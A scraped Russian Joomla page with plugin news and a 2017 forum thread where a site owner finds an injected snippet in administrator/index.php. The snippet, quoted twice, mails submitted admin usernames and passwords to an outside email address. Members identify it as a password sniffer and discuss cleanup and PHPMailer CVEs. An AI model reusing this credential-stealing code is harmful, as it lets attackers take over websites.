Новости Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla 🖨Ну что, интересная инициатива от @webtolkru в виде интервью с разными участниками весьма меня увлекла. Я, вооружившись данным примером, решил подготовить выпуск для NorrNext (@norrnext) и экстраполировал идею на международный масштаб. Теперь готовлю эксклюзивный выпуск с участниками Joomla сообщества со всего мира, которые, в той или иной мере, внесли свой вклад в развитие и популяризацию системы. Будут беседы с людьми из разных стран и фото с юбилейной символикой 📸Работа в процессе 👆 📝О результатах оповещу отдельно.

0 Пользователей и 1 Гость просматривают эту тему.
  • 22 Ответов
  • 2258 Просмотров
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:
Код
mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers: 


Что это такое и откуда нои растут?
Спасибо за объяснения!
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #2 : 27.04.2017, 22:40:47 »
Нечто, чего стандартно нет

Стандартно? У Вас тоже есть такое в файле? -  "To: xanalyzer@yahoo.com"
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #4 : 27.04.2017, 23:07:42 »

я вас не понял. Чего нет?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #5 : 27.04.2017, 23:12:46 »
Может снифер пассов какой встроен под маил функцию, зацените index.php!
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #6 : 27.04.2017, 23:23:21 »
Может снифер пассов какой встроен под маил функцию, зацените index.php!
Точно, какая-то зараза прописала вот что:
Код
if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #7 : 27.04.2017, 23:27:57 »
Точно, какая-то зараза прописала вот что:
Код
if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}
Так оно и есть!, вводимые логин:пасс отправляются хозяину снифера на почту!

P.S: Сам по себе он там не мог оказаться, бывают такие моменты, когда такой подход используют место бэгдоров, тут походу сайт надо лечить и безопасить!
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #8 : 27.04.2017, 23:37:20 »
первым делом, я так понял мне нужно сменить пароль и логин?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Странный файл появляется- php-mail.log
« Ответ #9 : 28.04.2017, 05:24:30 »
При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:
Код
mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers: 


Что это такое и откуда нои растут?
Спасибо за объяснения!

Папки .php не должно быть, то есть нужно удалить. И искать скрипт который в процессе запуска создает эту папку и  файл.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #10 : 28.04.2017, 08:41:45 »
первым делом, я так понял мне нужно сменить пароль и логин?
Нет, так как вводимые логин пасс, сразу отправляются злоумышленнику на почту, вам сначала нужно вычистить заразу, только потом менять все логины пароли в системе


Папки .php не должно быть, то есть нужно удалить. И искать скрипт который в процессе запуска создает эту папку и  файл.
В зависимости от архитектуры сервака, в этой папке ведется логирование использование mail() функции, т.е она должна быть!
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #11 : 28.04.2017, 11:01:29 »
Нет, так как вводимые логин пасс, сразу отправляются злоумышленнику на почту, вам сначала нужно вычистить заразу, только потом менять все логины пароли в системе
так я нашёл что у меня узвимости не закрты PHPMailer, может это оно и удалю тот код в файле index.php, что хакер насадил- этого не достаточно?
*

ProtectYourSite

  • Живу я здесь
  • 2366
  • 138 / 4
  • Безопасность вебсайтов
Re: Странный файл появляется- php-mail.log
« Ответ #12 : 28.04.2017, 11:14:39 »
Joomla не подвержена атакам уязвимости PHPMailer, если только не используется в стороннем приложении.
Так что дело скорее всего в другом.
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #13 : 28.04.2017, 11:37:29 »
Joomla не подвержена атакам уязвимости PHPMailer, если только не используется в стороннем приложении.
Так что дело скорее всего в другом.
Как так? А это шо? - Критические замечания:
Код
Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Странный файл появляется- php-mail.log
« Ответ #14 : 28.04.2017, 11:44:10 »
Выше ж написали - не подвержена.
Лучше версию (историю версий) озвучьте, наличие сторонних расширений и вареза.
Ну и может сайт не 1 на аккаунте
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Странный файл появляется- php-mail.log
« Ответ #15 : 28.04.2017, 11:44:24 »
Как так? А это шо? - Критические замечания:
Код
Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
Это то, что библиотека использует уязвимый класс, но для реализации самой уязвимости, нужны определенные условия которые стандартная Joomla не использует, следовательно она не юзебильная... в соседней теме вам подсказали, что нужно сделать если хотите обновить библиотеку
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #16 : 28.04.2017, 11:48:12 »
в соседней теме вам подсказали, что нужно сделать если хотите обновить библиотеку
библиотеку исправил по рекомендованной теме, спасибо за подсказку!
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #17 : 28.04.2017, 14:49:33 »
Выше ж написали - не подвержена.
Лучше версию (историю версий) озвучьте, наличие сторонних расширений и вареза.
Ну и может сайт не 1 на аккаунте
моя наверно поддвежена, так как у меня ещё Joomla 1.5.26

P.S:В PHPMailer, популярной библиотеке для организации отправки электронный писем из приложений на языке PHP, число пользователей которой оценивается в 9 миллионов, обнаружена критическая уязвимость (CVE-2016-10033), позволяющая инициировать удаленное выполнение кода без прохождения аутентификации.

Что здесь  "инициировать удаленное выполнение кода без прохождения аутентификации" - это относиться к Joomla или к чем-уто другому? Т.е я так понял можно взломать Joomla через PHPMailer уязвимость?
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Странный файл появляется- php-mail.log
« Ответ #18 : 28.04.2017, 15:18:49 »
Вот здесь всё расписано.

Кратко - если нет сторонних форм, которые используют phpmailer в обход класса JMail, то уязвимость эксплуатировать никак нельзя.
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Странный файл появляется- php-mail.log
« Ответ #19 : 28.04.2017, 15:19:59 »
моя наверно поддвежена, так как у меня ещё Joomla 1.5.26
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #20 : 28.04.2017, 15:42:23 »
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости
я эти патчи применял уже давно
В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости
да нет, вроде ещё в конце 2015 года эту заплатку я ставил на все сайты
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Странный файл появляется- php-mail.log
« Ответ #21 : 28.04.2017, 15:45:29 »
Вроде.. может..
Смотреть надо что сидит и какие уязвимости есть.

Если поставили заплатку не в течении первого часа то существенная вероятность что заразали уже тогда.
А частичная чистка не поможет - даже если в одном месте шелл остался, всё будет повторяться
*

Elimelech

  • Захожу иногда
  • 261
  • 2 / 0
Re: Странный файл появляется- php-mail.log
« Ответ #22 : 28.04.2017, 15:48:10 »
Вроде.. может..
Смотреть надо что сидит и какие уязвимости есть.

Если поставили заплатку не в течении первого часа то существенная вероятность что заразали уже тогда.
А частичная чистка не поможет - даже если в одном месте шелл остался, всё будет повторяться
сегодня пройду сайты скриптом ai-bolit, может поможет что покажит...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 4200
Последний ответ 08.05.2021, 16:16:32
от gartes
RSFireWall - как сделать файл Hashes для новой версии Joomla

Автор Lopes-popes

Ответов: 11
Просмотров: 2765
Последний ответ 18.12.2019, 15:41:26
от Театрал
Постоянно появляется вирус троян

Автор andrey77777

Ответов: 43
Просмотров: 13097
Последний ответ 14.09.2019, 23:37:21
от wishlight
Файл конфигурации попытка взлома

Автор Evgenii_web

Ответов: 8
Просмотров: 1642
Последний ответ 09.03.2019, 11:06:54
от wishlight
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 34
Просмотров: 8308
Последний ответ 14.08.2018, 10:58:57
от winstrool